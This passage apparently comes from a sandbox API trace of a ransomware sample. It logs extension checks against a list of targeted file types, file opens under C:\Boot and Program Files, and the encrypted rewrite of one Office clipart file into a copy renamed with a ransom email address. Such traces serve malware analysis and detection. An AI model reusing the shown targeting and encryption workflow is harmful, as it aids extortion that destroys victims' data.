(lpString=".7z") returned 3 [0178.494] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0178.494] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0178.494] lstrlenW (lpString=".dbf") returned 4 [0178.494] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0178.494] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0178.494] lstrlenW (lpString=".1cd") returned 4 [0178.494] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0178.494] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0178.494] lstrlenW (lpString=".jpg") returned 4 [0178.495] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0178.495] lstrcmpiW (lpString1=".p7b", lpString2=".bat") returned 1 [0178.495] lstrlenW (lpString="updaterevokesipolicy.p7b") returned 24 [0178.495] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0178.496] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=4662) returned 1 [0178.496] CloseHandle (hObject=0x300) returned 1 [0178.496] GetFileAttributesW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b")) returned 0x20 [0178.496] GetFileAttributesW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\updaterevokesipolicy.p7b.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.496] CreateFileW (lpFileName="C:\\Boot\\updaterevokesipolicy.p7b" (normalized: "c:\\boot\\updaterevokesipolicy.p7b"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.496] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0178.496] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0178.496] lstrlenW (lpString=".doc") returned 4 [0178.497] lstrcmpiW (lpString1=".doc", lpString2=".p7b") returned -1 [0178.497] lstrlenW (lpString=".docx") returned 5 [0178.497] lstrcmpiW (lpString1=".docx", lpString2="y.p7b") returned -1 [0178.497] lstrlenW (lpString=".pdf") returned 4 [0178.497] lstrcmpiW (lpString1=".pdf", lpString2=".p7b") returned 1 [0178.497] lstrlenW (lpString=".xls") returned 4 [0178.497] lstrcmpiW (lpString1=".xls", lpString2=".p7b") returned 1 [0178.497] lstrlenW (lpString=".xlsx") returned 5 [0178.497] lstrcmpiW (lpString1=".xlsx", lpString2="y.p7b") returned -1 [0178.497] lstrlenW (lpString=".ppt") returned 4 [0178.497] lstrcmpiW (lpString1=".ppt", lpString2=".p7b") returned 1 [0178.497] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0178.497] lstrlenW (lpString=".zip") returned 4 [0178.497] lstrcmpiW (lpString1=".zip", lpString2=".p7b") returned 1 [0178.497] lstrlenW (lpString=".rar") returned 4 [0178.497] lstrcmpiW (lpString1=".rar", lpString2=".p7b") returned 1 [0178.497] lstrlenW (lpString=".bz2") returned 4 [0178.497] lstrcmpiW (lpString1=".bz2", lpString2=".p7b") returned -1 [0178.497] lstrlenW (lpString=".7z") returned 3 [0178.497] lstrcmpiW (lpString1=".7z", lpString2="p7b") returned -1 [0178.497] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0178.497] lstrlenW (lpString=".dbf") returned 4 [0178.497] lstrcmpiW (lpString1=".dbf", lpString2=".p7b") returned -1 [0178.497] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0178.497] lstrlenW (lpString=".1cd") returned 4 [0178.497] lstrcmpiW (lpString1=".1cd", lpString2=".p7b") returned -1 [0178.497] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0178.497] lstrlenW (lpString=".jpg") returned 4 [0178.497] lstrcmpiW (lpString1=".jpg", lpString2=".p7b") returned -1 [0178.498] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0178.498] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0178.498] lstrlenW (lpString=".doc") returned 4 [0178.498] lstrcmpiW (lpString1=".doc", lpString2=".p7b") returned -1 [0178.498] lstrlenW (lpString=".docx") returned 5 [0178.498] lstrcmpiW (lpString1=".docx", lpString2="y.p7b") returned -1 [0178.498] lstrlenW (lpString=".pdf") returned 4 [0178.498] lstrcmpiW (lpString1=".pdf", lpString2=".p7b") returned 1 [0178.498] lstrlenW (lpString=".xls") returned 4 [0178.498] lstrcmpiW (lpString1=".xls", lpString2=".p7b") returned 1 [0178.498] lstrlenW (lpString=".xlsx") returned 5 [0178.498] lstrcmpiW (lpString1=".xlsx", lpString2="y.p7b") returned -1 [0178.498] lstrlenW (lpString=".ppt") returned 4 [0178.498] lstrcmpiW (lpString1=".ppt", lpString2=".p7b") returned 1 [0178.498] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0178.498] lstrlenW (lpString=".zip") returned 4 [0178.498] lstrcmpiW (lpString1=".zip", lpString2=".p7b") returned 1 [0178.498] lstrlenW (lpString=".rar") returned 4 [0178.498] lstrcmpiW (lpString1=".rar", lpString2=".p7b") returned 1 [0178.498] lstrlenW (lpString=".bz2") returned 4 [0178.498] lstrcmpiW (lpString1=".bz2", lpString2=".p7b") returned -1 [0178.498] lstrlenW (lpString=".7z") returned 3 [0178.498] lstrcmpiW (lpString1=".7z", lpString2="p7b") returned -1 [0178.498] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0178.498] lstrlenW (lpString=".dbf") returned 4 [0178.498] lstrcmpiW (lpString1=".dbf", lpString2=".p7b") returned -1 [0178.498] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0178.498] lstrlenW (lpString=".1cd") returned 4 [0178.498] lstrcmpiW (lpString1=".1cd", lpString2=".p7b") returned -1 [0178.498] lstrlenW (lpString="C:\\Boot\\updaterevokesipolicy.p7b") returned 32 [0178.499] lstrlenW (lpString=".jpg") returned 4 [0178.499] lstrcmpiW (lpString1=".jpg", lpString2=".p7b") returned -1 [0178.499] Sleep (dwMilliseconds=0x64) [0179.081] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0179.081] lstrlenW (lpString="adcvbs.inc") returned 10 [0179.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.081] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=623) returned 1 [0179.081] CloseHandle (hObject=0x340) returned 1 [0179.081] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc")) returned 0x20 [0179.082] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.082] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" (normalized: "c:\\program files\\common files\\system\\msadc\\adcvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.082] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0179.082] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0179.082] lstrlenW (lpString=".doc") returned 4 [0179.082] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0179.082] lstrlenW (lpString=".docx") returned 5 [0179.082] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0179.082] lstrlenW (lpString=".pdf") returned 4 [0179.082] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0179.082] lstrlenW (lpString=".xls") returned 4 [0179.082] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0179.082] lstrlenW (lpString=".xlsx") returned 5 [0179.082] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0179.082] lstrlenW (lpString=".ppt") returned 4 [0179.082] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0179.082] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0179.082] lstrlenW (lpString=".zip") returned 4 [0179.082] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0179.082] lstrlenW (lpString=".rar") returned 4 [0179.082] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0179.082] lstrlenW (lpString=".bz2") returned 4 [0179.082] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0179.082] lstrlenW (lpString=".7z") returned 3 [0179.083] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0179.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0179.083] lstrlenW (lpString=".dbf") returned 4 [0179.083] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0179.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0179.083] lstrlenW (lpString=".1cd") returned 4 [0179.083] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0179.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0179.083] lstrlenW (lpString=".jpg") returned 4 [0179.083] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0179.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0179.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0179.083] lstrlenW (lpString=".doc") returned 4 [0179.083] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0179.083] lstrlenW (lpString=".docx") returned 5 [0179.083] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0179.083] lstrlenW (lpString=".pdf") returned 4 [0179.083] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0179.083] lstrlenW (lpString=".xls") returned 4 [0179.083] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0179.083] lstrlenW (lpString=".xlsx") returned 5 [0179.083] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0179.083] lstrlenW (lpString=".ppt") returned 4 [0179.083] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0179.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0179.083] lstrlenW (lpString=".zip") returned 4 [0179.083] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0179.084] lstrlenW (lpString=".rar") returned 4 [0179.084] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0179.084] lstrlenW (lpString=".bz2") returned 4 [0179.084] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0179.084] lstrlenW (lpString=".7z") returned 3 [0179.084] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0179.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0179.084] lstrlenW (lpString=".dbf") returned 4 [0179.084] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0179.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0179.084] lstrlenW (lpString=".1cd") returned 4 [0179.084] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0179.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned 53 [0179.084] lstrlenW (lpString=".jpg") returned 4 [0179.084] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0179.084] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0179.084] lstrlenW (lpString="oledbjvs.inc") returned 12 [0179.084] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.085] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=9804) returned 1 [0179.085] CloseHandle (hObject=0x340) returned 1 [0179.085] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc")) returned 0x20 [0179.085] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbjvs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0179.085] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0179.085] lstrlenW (lpString=".doc") returned 4 [0179.085] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0179.085] lstrlenW (lpString=".docx") returned 5 [0179.085] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0179.085] lstrlenW (lpString=".pdf") returned 4 [0179.086] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0179.086] lstrlenW (lpString=".xls") returned 4 [0179.086] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0179.086] lstrlenW (lpString=".xlsx") returned 5 [0179.086] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0179.086] lstrlenW (lpString=".ppt") returned 4 [0179.086] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0179.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0179.086] lstrlenW (lpString=".zip") returned 4 [0179.086] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0179.086] lstrlenW (lpString=".rar") returned 4 [0179.086] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0179.086] lstrlenW (lpString=".bz2") returned 4 [0179.086] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0179.086] lstrlenW (lpString=".7z") returned 3 [0179.086] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0179.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0179.086] lstrlenW (lpString=".dbf") returned 4 [0179.086] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0179.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0179.086] lstrlenW (lpString=".1cd") returned 4 [0179.086] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0179.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0179.086] lstrlenW (lpString=".jpg") returned 4 [0179.086] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0179.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0179.086] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0179.086] lstrlenW (lpString=".doc") returned 4 [0179.087] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0179.087] lstrlenW (lpString=".docx") returned 5 [0179.087] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0179.087] lstrlenW (lpString=".pdf") returned 4 [0179.087] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0179.087] lstrlenW (lpString=".xls") returned 4 [0179.087] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0179.087] lstrlenW (lpString=".xlsx") returned 5 [0179.087] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0179.087] lstrlenW (lpString=".ppt") returned 4 [0179.087] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0179.087] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0179.087] lstrlenW (lpString=".zip") returned 4 [0179.087] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0179.087] lstrlenW (lpString=".rar") returned 4 [0179.087] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0179.087] lstrlenW (lpString=".bz2") returned 4 [0179.087] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0179.087] lstrlenW (lpString=".7z") returned 3 [0179.087] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0179.087] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0179.087] lstrlenW (lpString=".dbf") returned 4 [0179.087] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0179.087] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0179.087] lstrlenW (lpString=".1cd") returned 4 [0179.087] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0179.087] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc") returned 56 [0179.087] lstrlenW (lpString=".jpg") returned 4 [0179.087] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0179.088] lstrcmpiW (lpString1=".inc", lpString2=".bat") returned 1 [0179.088] lstrlenW (lpString="oledbvbs.inc") returned 12 [0179.088] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.088] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=9975) returned 1 [0179.088] CloseHandle (hObject=0x340) returned 1 [0179.088] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc")) returned 0x20 [0179.089] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.089] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc" (normalized: "c:\\program files\\common files\\system\\ole db\\oledbvbs.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0179.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0179.089] lstrlenW (lpString=".doc") returned 4 [0179.089] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0179.089] lstrlenW (lpString=".docx") returned 5 [0179.089] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0179.089] lstrlenW (lpString=".pdf") returned 4 [0179.089] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0179.089] lstrlenW (lpString=".xls") returned 4 [0179.089] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0179.089] lstrlenW (lpString=".xlsx") returned 5 [0179.089] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0179.089] lstrlenW (lpString=".ppt") returned 4 [0179.089] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0179.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0179.089] lstrlenW (lpString=".zip") returned 4 [0179.089] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0179.089] lstrlenW (lpString=".rar") returned 4 [0179.089] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0179.089] lstrlenW (lpString=".bz2") returned 4 [0179.090] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0179.090] lstrlenW (lpString=".7z") returned 3 [0179.090] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0179.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0179.090] lstrlenW (lpString=".dbf") returned 4 [0179.090] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0179.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0179.090] lstrlenW (lpString=".1cd") returned 4 [0179.090] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0179.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0179.090] lstrlenW (lpString=".jpg") returned 4 [0179.090] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0179.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0179.090] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0179.090] lstrlenW (lpString=".doc") returned 4 [0179.090] lstrcmpiW (lpString1=".doc", lpString2=".inc") returned -1 [0179.090] lstrlenW (lpString=".docx") returned 5 [0179.090] lstrcmpiW (lpString1=".docx", lpString2="s.inc") returned -1 [0179.090] lstrlenW (lpString=".pdf") returned 4 [0179.090] lstrcmpiW (lpString1=".pdf", lpString2=".inc") returned 1 [0179.090] lstrlenW (lpString=".xls") returned 4 [0179.090] lstrcmpiW (lpString1=".xls", lpString2=".inc") returned 1 [0179.090] lstrlenW (lpString=".xlsx") returned 5 [0179.090] lstrcmpiW (lpString1=".xlsx", lpString2="s.inc") returned -1 [0179.090] lstrlenW (lpString=".ppt") returned 4 [0179.090] lstrcmpiW (lpString1=".ppt", lpString2=".inc") returned 1 [0179.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0179.091] lstrlenW (lpString=".zip") returned 4 [0179.091] lstrcmpiW (lpString1=".zip", lpString2=".inc") returned 1 [0179.091] lstrlenW (lpString=".rar") returned 4 [0179.091] lstrcmpiW (lpString1=".rar", lpString2=".inc") returned 1 [0179.091] lstrlenW (lpString=".bz2") returned 4 [0179.091] lstrcmpiW (lpString1=".bz2", lpString2=".inc") returned -1 [0179.091] lstrlenW (lpString=".7z") returned 3 [0179.091] lstrcmpiW (lpString1=".7z", lpString2="inc") returned -1 [0179.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0179.091] lstrlenW (lpString=".dbf") returned 4 [0179.091] lstrcmpiW (lpString1=".dbf", lpString2=".inc") returned -1 [0179.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0179.091] lstrlenW (lpString=".1cd") returned 4 [0179.091] lstrcmpiW (lpString1=".1cd", lpString2=".inc") returned -1 [0179.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbvbs.inc") returned 56 [0179.091] lstrlenW (lpString=".jpg") returned 4 [0179.091] lstrcmpiW (lpString1=".jpg", lpString2=".inc") returned 1 [0179.091] Sleep (dwMilliseconds=0x64) [0179.476] Sleep (dwMilliseconds=0x64) [0179.793] Sleep (dwMilliseconds=0x64) [0181.531] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0181.531] lstrlenW (lpString="J0105376.WMF") returned 12 [0181.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0181.532] GetFileSizeEx (in: hFile=0x360, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=4964) returned 1 [0181.532] CloseHandle (hObject=0x360) returned 1 [0181.532] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf")) returned 0x220 [0181.532] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x360 [0181.532] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0181.533] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0181.533] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105376.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105376.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0181.533] GetLastError () returned 0x0 [0181.533] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x1364, lpOverlapped=0x0) returned 1 [0181.690] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x1370, lpOverlapped=0x0) returned 1 [0181.693] ReadFile (in: hFile=0x360, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0181.693] WriteFile (in: hFile=0x368, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0181.693] SetEndOfFile (hFile=0x368) returned 1 [0181.693] CloseHandle (hObject=0x368) returned 1 [0181.693] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, 